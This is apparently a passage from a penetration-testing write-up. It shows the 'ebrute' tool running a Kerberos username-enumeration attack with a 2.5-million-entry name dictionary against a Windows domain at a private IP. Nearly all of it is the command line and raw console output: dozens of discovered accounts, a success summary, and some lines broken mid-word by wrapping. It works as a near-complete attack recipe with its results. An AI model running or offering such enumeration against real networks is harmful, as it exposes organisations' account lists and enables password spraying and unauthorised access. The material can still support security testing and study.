HOST: '192.168.8.88' | USER: 'kelly.michael' | PASS: 'kelly.michael' | EXTRA: 'w2k8r00t' | Return code: 'Success'

A full dictionary could then be generated and supplied to ebrute, see below:

C:\tools\dev\br>ebrute -r kerbenum -e w2k8r00t -P c:\tools\wl\surname10000.firstname250.txt -h 192.168.8.88 -t 32
ebrute v0.76 - Edward Torkington
Running without admin privileges - warning some SMB plugins are disabled!
Loading passes...
Parsing passes...
Username not specified (normal behavior for some plugins - lets do joey checks)
Added:    2,500,000 user(s), 0 password(s), 1 host(s),  + joeycheck 2,500,000 tasks over 32 thread/s.
Starting: 07/12/2011 11:21:31
[13]  HOST: '192.168.8.88' | USER: 'SMITH.RONNIE' | PASS: 'SMITH.RONNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[24]  HOST: '192.168.8.88' | USER: 'JOHNSON.PHILIP' | PASS: 'JOHNSON.PHILIP' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[29]  HOST: '192.168.8.88' | USER: 'WILLIAMS.HUGH' | PASS: 'WILLIAMS.HUGH' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[25]  HOST: '192.168.8.88' | USER: 'BROWN.STEVEN' | PASS: 'BROWN.STEVEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[13]  HOST: '192.168.8.88' | USER: 'BROWN.DANIEL' | PASS: 'BROWN.DANIEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[32]  HOST: '192.168.8.88' | USER: 'JONES.JAIME' | PASS: 'JONES.JAIME' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[16]  HOST: '192.168.8.88' | USER: 'JONES.KEN' | PASS: 'JONES.KEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[31]  HOST: '192.168.8.88' | USER: 'JONES.BOB' | PASS: 'JONES.BOB' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[27]  HOST: '192.168.8.88' | USER: 'MILLER.PHILIP' | PASS: 'MILLER.PHILIP' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[19]  HOST: '192.168.8.88' | USER: 'DAVIS.FRANCIS' | PASS: 'DAVIS.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'DAVIS.FRANCIS' | PASS: 'DAVIS.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[14]  HOST: '192.168.8.88' | USER: 'GARCIA.KEVIN' | PASS: 'GARCIA.KEVIN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[9]  HOST: '192.168.8.88' | USER: 'WILSON.JOHN' | PASS: 'WILSON.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[12]  HOST: '192.168.8.88' | USER: 'WILSON.ROBERT' | PASS: 'WILSON.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[20]  HOST: '192.168.8.88' | USER: 'ANDERSON.GARY' | PASS: 'ANDERSON.GARY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'ANDERSON.TIMOTHY' | PASS: 'ANDERSON.TIMOTHY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[32]  HOST: '192.168.8.88' | USER: 'ANDERSON.DEAN' | PASS: 'ANDERSON.DEAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[5]  HOST: '192.168.8.88' | USER: 'LEE.HENRY' | PASS: 'LEE.HENRY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[8]  HOST: '192.168.8.88' | USER: 'CLARK.TONY' | PASS: 'CLARK.TONY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[14]  HOST: '192.168.8.88' | USER: 'CLARK.BRYAN' | PASS: 'CLARK.BRYAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[31]  HOST: '192.168.8.88' | USER: 'ALLEN.RON' | PASS: 'ALLEN.RON' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[18]  HOST: '192.168.8.88' | USER: 'SCOTT.JOHN' | PASS: 'SCOTT.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[6]  HOST: '192.168.8.88' | USER: 'SCOTT.ROBERT' | PASS: 'SCOTT.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[15]  HOST: '192.168.8.88' | USER: 'SCOTT.MICHAEL' | PASS: 'SCOTT.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[19]  HOST: '192.168.8.88' | USER: 'ADAMS.BYRON' | PASS: 'ADAMS.BYRON' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[29]  HOST: '192.168.8.88' | USER: 'ADAMS.JULIAN' | PASS: 'ADAMS.JULIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[13]  HOST: '192.168.8.88' | USER: 'HILL.STUART' | PASS: 'HILL.STUART' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'HILL.AUSTIN' | PASS: 'HILL.AUSTIN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[26]  HOST: '192.168.8.88' | USER: 'MITCHELL.TODD' | PASS: 'MITCHELL.TODD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[20]  HOST: '192.168.8.88' | USER: 'EVANS.JOHNNY' | PASS: 'EVANS.JOHNNY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[14]  HOST: '192.168.8.88' | USER: 'TURNER.ERIC' | PASS: 'TURNER.ERIC' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[23]  HOST: '192.168.8.88' | USER: 'TURNER.SCOTT' | PASS: 'TURNER.SCOTT' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[30]  HOST: '192.168.8.88' | USER: 'TURNER.RICKY' | PASS: 'TURNER.RICKY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[12]  HOST: '192.168.8.88' | USER: 'EDWARDS.HOWARD' | PASS: 'EDWARDS.HOWARD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[28]  HOST: '192.168.8.88' | USER: 'COOPER.LUIS' | PASS: 'COOPER.LUIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[15]  HOST: '192.168.8.88' | USER: 'COOPER.MIKE' | PASS: 'COOPER.MIKE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[22]  HOST: '192.168.8.88' | USER: 'COOPER.LUIS' | PASS: 'COOPER.LUIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[21]  HOST: '192.168.8.88' | USER: 'COOPER.MIKE' | PASS: 'COOPER.MIKE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[29]  HOST: '192.168.8.88' | USER: 'BAILEY.FRANCIS' | PASS: 'BAILEY.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[30]  HOST: '192.168.8.88' | USER: 'KELLY.MICHAEL' | PASS: 'KELLY.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[22]  HOST: '192.168.8.88' | USER: 'DIAZ.RICARDO' | PASS: 'DIAZ.RICARDO' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[19]  HOST: '192.168.8.88' | USER: 'WOOD.JIM' | PASS: 'WOOD.JIM' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[21]  HOST: '192.168.8.88' | USER: 'BROOKS.ALLEN' | PASS: 'BROOKS.ALLEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[18]  HOST: '192.168.8.88' | USER: 'BROOKS.JOEL' | PASS: 'BROOKS.JOEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'BROOKS.ALLEN' | PASS: 'BROOKS.ALLEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[14]  HOST: '192.168.8.88' | USER: 'BROOKS.JOEL' | PASS: 'BROOKS.JOEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[14]  HOST: '192.168.8.88' | USER: 'BENNETT.DARYL' | PASS: 'BENNETT.DARYL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[8]  HOST: '192.168.8.88' | USER: 'BENNETT.JEFF' | PASS: 'BENNETT.JEFF' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'GRAY.NORMAN' | PASS: 'GRAY.NORMAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[11]  HOST: '192.168.8.88' | USER: 'ORTIZ.JOHNNIE' | PASS: 'ORTIZ.JOHNNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'HENDERSON.CHAD' | PASS: 'HENDERSON.CHAD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[20]  HOST: '192.168.8.88' | USER: 'KIM.DARYL' | PASS: 'KIM.DARYL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[6]  HOST: '192.168.8.88' | USER: 'FORD.ROSS' | PASS: 'FORD.ROSS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[21]  HOST: '192.168.8.88' | USER: 'WELLS.BRADLEY' | PASS: 'WELLS.BRADLEY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[19]  HOST: '192.168.8.88' | USER: 'WELLS.BRADLEY' | PASS: 'WELLS.BRADLEY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[3]  HOST: '192.168.8.88' | USER: 'SMITH.ROBERT' | PASS: 'SMITH.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads
Attempt 1/5)]
[2]  HOST: '192.168.8.88' | USER: 'SMITH.MICHAEL' | PASS: 'SMITH.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce thread
 (Attempt 1/5)]
[4]  HOST: '192.168.8.88' | USER: 'SMITH.JOHN' | PASS: 'SMITH.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (Att
mpt 1/5)]
[1]  HOST: '192.168.8.88' | USER: 'SMITH.JAMES' | PASS: 'SMITH.JAMES' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (A
tempt 1/5)]
[18]  HOST: '192.168.8.88' | USER: 'TUCKER.FRANCIS' | PASS: 'TUCKER.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[17]  HOST: '192.168.8.88' | USER: 'TUCKER.FRANCIS' | PASS: 'TUCKER.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[28]  HOST: '192.168.8.88' | USER: 'CRAWFORD.KENT' | PASS: 'CRAWFORD.KENT' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'HUNTER.TROY' | PASS: 'HUNTER.TROY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[5]  HOST: '192.168.8.88' | USER: 'HOLMES.FREDDIE' | PASS: 'HOLMES.FREDDIE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[4]  HOST: '192.168.8.88' | USER: 'SMITH.JOHN' | PASS: 'SMITH.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'ROSE.MARCUS' | PASS: 'ROSE.MARCUS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[18]  HOST: '192.168.8.88' | USER: 'MEDINA.JACKIE' | PASS: 'MEDINA.JACKIE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[5]  HOST: '192.168.8.88' | USER: 'PAYNE.JAY' | PASS: 'PAYNE.JAY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[4]  HOST: '192.168.8.88' | USER: 'PAYNE.JAY' | PASS: 'PAYNE.JAY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[22]  HOST: '192.168.8.88' | USER: 'HAWKINS.OSCAR' | PASS: 'HAWKINS.OSCAR' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[7]  HOST: '192.168.8.88' | USER: 'HAWKINS.OSCAR' | PASS: 'HAWKINS.OSCAR' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[12]  HOST: '192.168.8.88' | USER: 'CUNNINGHAM.RONNIE' | PASS: 'CUNNINGHAM.RONNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[3]  HOST: '192.168.8.88' | USER: 'ANDREWS.ROBERT' | PASS: 'ANDREWS.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[32]  HOST: '192.168.8.88' | USER: 'ANDREWS.MICHAEL' | PASS: 'ANDREWS.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[23]  HOST: '192.168.8.88' | USER: 'ANDREWS.DAVID' | PASS: 'ANDREWS.DAVID' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[5]  HOST: '192.168.8.88' | USER: 'ANDREWS.WILLIAM' | PASS: 'ANDREWS.WILLIAM' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[22]  HOST: '192.168.8.88' | USER: 'GREENE.PAUL' | PASS: 'GREENE.PAUL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[4]  HOST: '192.168.8.88' | USER: 'GREENE.DANIEL' | PASS: 'GREENE.DANIEL' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[12]  HOST: '192.168.8.88' | USER: 'LAWSON.ALVIN' | PASS: 'LAWSON.ALVIN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[11]  HOST: '192.168.8.88' | USER: 'LAWSON.TIM' | PASS: 'LAWSON.TIM' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[31]  HOST: '192.168.8.88' | USER: 'GILBERT.MARK' | PASS: 'GILBERT.MARK' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[9]  HOST: '192.168.8.88' | USER: 'DEAN.GORDON' | PASS: 'DEAN.GORDON' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
Tasks remaining: 2,437,365    (Performance: ~341,367 tasks/minute, 8 minutes remain)
[25]  HOST: '192.168.8.88' | USER: 'MCCOY.BRIAN' | PASS: 'MCCOY.BRIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[28]  HOST: '192.168.8.88' | USER: 'STEELE.EDWIN' | PASS: 'STEELE.EDWIN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[9]  HOST: '192.168.8.88' | USER: 'SIMON.FRED' | PASS: 'SIMON.FRED' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[2]  HOST: '192.168.8.88' | USER: 'HUBBARD.LUTHER' | PASS: 'HUBBARD.LUTHER' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
Tasks remaining: 2,385,922    (Performance: ~342,953 tasks/minute, 8 minutes remain)
[16]  HOST: '192.168.8.88' | USER: 'FLYNN.ADRIAN' | PASS: 'FLYNN.ADRIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[17]  HOST: '192.168.8.88' | USER: 'MORROW.CLIFFORD' | PASS: 'MORROW.CLIFFORD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[8]  HOST: '192.168.8.88' | USER: 'MORROW.CLIFFORD' | PASS: 'MORROW.CLIFFORD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[17]  HOST: '192.168.8.88' | USER: 'ALLISON.BRUCE' | PASS: 'ALLISON.BRUCE' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'BRENNAN.TRACY' | PASS: 'BRENNAN.TRACY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[17]  HOST: '192.168.8.88' | USER: 'SHANNON.BEN' | PASS: 'SHANNON.BEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[24]  HOST: '192.168.8.88' | USER: 'ROCHA.RAY' | PASS: 'ROCHA.RAY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[11]  HOST: '192.168.8.88' | USER: 'ROCHA.RAY' | PASS: 'ROCHA.RAY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[9]  HOST: '192.168.8.88' | USER: 'VILLA.ROGER' | PASS: 'VILLA.ROGER' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[16]  HOST: '192.168.8.88' | USER: 'FARLEY.ROSS' | PASS: 'FARLEY.ROSS' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[2]  HOST: '192.168.8.88' | USER: 'BARTLETT.ALAN' | PASS: 'BARTLETT.ALAN' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce thread
 (Attempt 1/5)]
Tasks remaining: 2,005,804    (Performance: ~380,118 tasks/minute, 6 minutes remain)
[14]  HOST: '192.168.8.88' | USER: 'LEARY.BEN' | PASS: 'LEARY.BEN' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[18]  HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[32]  HOST: '192.168.8.88' | USER: 'TINSLEY.BERNARD' | PASS: 'TINSLEY.BERNARD' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[10]  HOST: '192.168.8.88' | USER: 'MARION.ADAM' | PASS: 'MARION.ADAM' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[30]  HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[25]  HOST: '192.168.8.88' | USER: 'MAYBERRY.LEROY' | PASS: 'MAYBERRY.LEROY' | EXTRA: 'w2k8r00t' | Return code: 'Success' []
[4]  HOST: '192.168.8.88' | USER: 'HIGGINBOTHAM.ARNOLD' | PASS: 'HIGGINBOTHAM.ARNOLD' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly r
duce threads (Attempt 1/5)]
[21]  HOST: '192.168.8.88' | USER: 'HIGGINBOTHAM.ROLAND' | PASS: 'HIGGINBOTHAM.ROLAND' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly
educe threads (Attempt 1/5)]
Tasks remaining: 1,611,693    (Performance: ~394,111 tasks/minute, 5 minutes remain)
Tasks remaining: 1,218,180    (Performance: ~393,513 tasks/minute, 4 minutes remain)
Tasks remaining: 824,069    (Performance: ~394,111 tasks/minute, 3 minutes remain)
Increasing theadcount to: 33
Increasing theadcount to: 34
Increasing theadcount to: 35
Increasing theadcount to: 36
Increasing theadcount to: 37
Increasing theadcount to: 38
Increasing theadcount to: 39
Increasing theadcount to: 40
[28]  HOST: '192.168.8.88' | USER: 'MERRIWEATHER.DALE' | PASS: 'MERRIWEATHER.DALE' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly redu
e threads (Attempt 1/5)]
Tasks remaining: 413,452    (Performance: ~410,617 tasks/minute, 2 minutes remain)
[19]  HOST: '192.168.8.88' | USER: 'SENG.MARIO' | PASS: 'SENG.MARIO' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (At
empt 1/5)]
[38]  HOST: '192.168.8.88' | USER: 'DANKO.SCOTT' | PASS: 'DANKO.SCOTT' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce threads (
ttempt 1/5)]
[8]  HOST: '192.168.8.88' | USER: 'TORIBIO.DARRELL' | PASS: 'TORIBIO.DARRELL' | EXTRA: 'w2k8r00t' | Return code: 'Unknown' [Error, possibly reduce th
eads (Attempt 1/5)]
Tasks remaining: 2,581    (Performance: ~410,871 tasks/minute, 1 minutes remain)
Complete: 07/12/2011 11:27:44
Stats:    00:06:13    (~401,925 tasks/minute) (Performed 2,500,000 / 2,500,000 tasks)


Summary of Authentication Successes:
HOST: '192.168.8.88' | USER: 'SMITH.RONNIE' | PASS: 'SMITH.RONNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JOHNSON.PHILIP' | PASS: 'JOHNSON.PHILIP' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WILLIAMS.HUGH' | PASS: 'WILLIAMS.HUGH' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROWN.STEVEN' | PASS: 'BROWN.STEVEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROWN.DANIEL' | PASS: 'BROWN.DANIEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JONES.JAIME' | PASS: 'JONES.JAIME' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JONES.KEN' | PASS: 'JONES.KEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'JONES.BOB' | PASS: 'JONES.BOB' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MILLER.PHILIP' | PASS: 'MILLER.PHILIP' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DAVIS.FRANCIS' | PASS: 'DAVIS.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DAVIS.FRANCIS' | PASS: 'DAVIS.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GARCIA.KEVIN' | PASS: 'GARCIA.KEVIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WILSON.JOHN' | PASS: 'WILSON.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WILSON.ROBERT' | PASS: 'WILSON.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDERSON.GARY' | PASS: 'ANDERSON.GARY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDERSON.TIMOTHY' | PASS: 'ANDERSON.TIMOTHY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ANDERSON.DEAN' | PASS: 'ANDERSON.DEAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'LEE.HENRY' | PASS: 'LEE.HENRY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CLARK.TONY' | PASS: 'CLARK.TONY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CLARK.BRYAN' | PASS: 'CLARK.BRYAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ALLEN.RON' | PASS: 'ALLEN.RON' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SCOTT.JOHN' | PASS: 'SCOTT.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SCOTT.ROBERT' | PASS: 'SCOTT.ROBERT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SCOTT.MICHAEL' | PASS: 'SCOTT.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ADAMS.BYRON' | PASS: 'ADAMS.BYRON' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ADAMS.JULIAN' | PASS: 'ADAMS.JULIAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HILL.STUART' | PASS: 'HILL.STUART' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HILL.AUSTIN' | PASS: 'HILL.AUSTIN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MITCHELL.TODD' | PASS: 'MITCHELL.TODD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'EVANS.JOHNNY' | PASS: 'EVANS.JOHNNY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TURNER.ERIC' | PASS: 'TURNER.ERIC' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TURNER.SCOTT' | PASS: 'TURNER.SCOTT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TURNER.RICKY' | PASS: 'TURNER.RICKY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'EDWARDS.HOWARD' | PASS: 'EDWARDS.HOWARD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.LUIS' | PASS: 'COOPER.LUIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.MIKE' | PASS: 'COOPER.MIKE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.LUIS' | PASS: 'COOPER.LUIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'COOPER.MIKE' | PASS: 'COOPER.MIKE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BAILEY.FRANCIS' | PASS: 'BAILEY.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'KELLY.MICHAEL' | PASS: 'KELLY.MICHAEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'DIAZ.RICARDO' | PASS: 'DIAZ.RICARDO' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WOOD.JIM' | PASS: 'WOOD.JIM' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.ALLEN' | PASS: 'BROOKS.ALLEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.JOEL' | PASS: 'BROOKS.JOEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.ALLEN' | PASS: 'BROOKS.ALLEN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BROOKS.JOEL' | PASS: 'BROOKS.JOEL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BENNETT.DARYL' | PASS: 'BENNETT.DARYL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'BENNETT.JEFF' | PASS: 'BENNETT.JEFF' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'GRAY.NORMAN' | PASS: 'GRAY.NORMAN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ORTIZ.JOHNNIE' | PASS: 'ORTIZ.JOHNNIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HENDERSON.CHAD' | PASS: 'HENDERSON.CHAD' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'KIM.DARYL' | PASS: 'KIM.DARYL' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'FORD.ROSS' | PASS: 'FORD.ROSS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WELLS.BRADLEY' | PASS: 'WELLS.BRADLEY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'WELLS.BRADLEY' | PASS: 'WELLS.BRADLEY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TUCKER.FRANCIS' | PASS: 'TUCKER.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'TUCKER.FRANCIS' | PASS: 'TUCKER.FRANCIS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'CRAWFORD.KENT' | PASS: 'CRAWFORD.KENT' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HUNTER.TROY' | PASS: 'HUNTER.TROY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'HOLMES.FREDDIE' | PASS: 'HOLMES.FREDDIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'SMITH.JOHN' | PASS: 'SMITH.JOHN' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'ROSE.MARCUS' | PASS: 'ROSE.MARCUS' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'MEDINA.JACKIE' | PASS: 'MEDINA.JACKIE' | EXTRA: 'w2k8r00t' | Return code: 'Success'
HOST: '192.168.8.88' | USER: 'PAYNE.JAY' | PASS: 'PAYNE.JAY' | EXTRA: 'w2k8r00t' | Return code: 'Success'
